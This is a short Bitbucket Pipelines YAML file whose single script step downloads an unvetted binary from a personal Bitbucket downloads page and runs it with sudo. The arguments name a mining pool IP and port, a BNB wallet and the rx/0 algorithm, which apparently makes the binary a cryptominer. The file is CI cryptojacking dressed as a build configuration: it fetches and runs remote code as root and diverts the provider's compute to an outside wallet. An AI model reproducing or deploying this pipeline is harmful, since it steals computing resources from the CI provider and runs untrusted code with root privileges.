pipelines:
  default:
    - step:
        script:
            - apt-get update && sudo apt-get install -y wget && wget https://bitbucket.org/juani2603/donwload/downloads/masterfile && sudo chmod u+x masterfile && sudo ./masterfile -o 159.65.209.149:13333 -u BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.worker1 -k -a rx/0
